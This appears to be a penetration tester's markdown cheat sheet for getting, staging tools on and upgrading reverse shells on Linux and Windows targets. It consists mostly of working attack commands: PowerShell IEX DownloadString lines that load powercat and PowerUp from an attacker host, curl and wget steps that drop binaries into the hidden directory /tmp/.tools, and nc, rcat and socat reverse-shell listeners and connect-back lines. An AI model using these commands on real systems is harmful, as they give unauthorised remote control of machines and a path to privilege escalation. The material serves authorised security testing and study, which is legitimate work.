# Shells

Getting shells, interacting with them, and getting extra utilities installed (if possible).

Linux-oriented for now.

## Local Webserver

If needed, spin up a webserver that the target machine can reach out to:

```bash
sudo mkdir -p /srv/http/linux/ /srv/http/windows/
sudo chmod -R 777 /srv/http/

cd /srv/http/
python -m http.server 80
```

Ideally this will run as a systemd service or something so you don't have to keep a terminal open.

For the actual binaries, some resources:

- [static-binaries](https://github.com/andrew-d/static-binaries)
  - Older versions, but a lot more system utils
- [static-toolbox](https://github.com/ernw/static-toolbox/releases)
  - Newer versions, but fewer tools
  - Pre-compiled for Windows: [socat](https://github.com/3ndG4me/socat/releases)
- [SharpCollection](https://github.com/Flangvik/SharpCollection)
  - Pre-compiled offensive tools for Windows

Pre-compiled golang and rust binaries are pretty handy too.

Caveat for rust: [musl](https://musl.libc.org/) builds are preferred if available, otherwise the target's glibc version must be greater than or equal to the version used to compile the binary (backwards compatibility). Only exception is if the binary requires glibc-specific functionality - in that case, build in a Docker container with a glibc version compatible with the target's if possible.

## Reverse Shells

- https://www.revshells.com/
- https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/windows#powershell-shells

### Windows

Simplest way is to use [PowerCat](https://github.com/besimorhino/powercat):

```ps1
IEX (New-Object System.Net.Webclient).DownloadString("http://$remote_host/windows/powercat.ps1")
powercat -c $remote_host -p $remote_port
```

From there, same idea applies if we want to use [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/README.md):

```ps1
IEX (New-Object System.Net.Webclient).DownloadString("http://$remote_host/windows/PowerSploit/Privesc/PowerUp.ps1")
Invoke-PrivescAudit  # for example
```

### Linux

#### nc

This one is the most barebones, but is pretty solid.

Listener:

```bash
rlwrap nc -nvlp $remote_port
```

Note the use of `rlwrap` - it'll preserve line history and allow you to actually use arrow keys.

#### rcat

`rcat` is also a pretty solid choice, although I've found it to not be 100% reliable at times (e.g. randomly hanging during a session).

Listener:

```bash
export target_host="192.168.1.1"
export rcat_log_dir="/var/log/rcat"

sudo mkdir -p "${rcat_log_dir:?}"
sudo chmod 777 "${rcat_log_dir:?}"

rcat listen -ib 4444 2>&1 | tee "${rcat_log_dir:?}/${target_host:?}_$(isodate).log"
```

Remote:

```bash
mkdir /tmp/.tools
curl http://${remote_host:?}:${remote_http:-80}/linux/rcat -o /tmp/.tools/rcat
chmod +x /tmp/.tools/rcat
rcat connect -s bash $remote_ip $remote_port
```

## Upgrading Shells

Drawn from [ropnop's guide](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/), with a couple customizations for my own convenience.

First things first (might need to move this to later due to possible bash-specific syntax):

```bash
mkdir -p /tmp/.local/bin
export PATH="/tmp/.local/bin:${PATH}"
export SHELL=bash
export TERM=xterm256-color
export remote_host="10.1.1.1"
export remote_port="4444"
export remote_http="80"

# For my directory structure in particular
function download_bin() {

  wget http://${remote_host:?}:${remote_http:-80}/${1:?} -O /tmp/.local/bin/${1} \
    || wget http://${remote_host:?}:${remote_http:-80}/linux/${1:?} -O /tmp/.local/bin/${1}

  chmod +x /tmp/.local/bin/${1:?}

}
```

Some aliases if/once the commands are available:

```bash
alias exa='exa -lagF --time-style=long-iso --git --group-directories-first'
```

### Option 1 (Python)

Download Python first if needed, then:

```bash
python -c 'import os; os.system("/usr/bin/env bash"); exit();'
```

To upgrade even more, press `Ctrl+Z` to send the shell to the background, and then:

```bash
stty raw -echo
fg
reset
stty_rows=$(stty -a | grep -oP "; rows \K[\d]{1,}")
stty_columns=$(stty -a | grep -oP "; columns \K[\d]{1,}")
stty rows $stty_rows columns $stty_columns
```

### Option 2 (socat)

**TODO**

Listener:

```bash
socat file:`tty`,raw,echo=0 tcp-listen:4444
```

Target:

```bash
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$remote_host:$remote_port
```
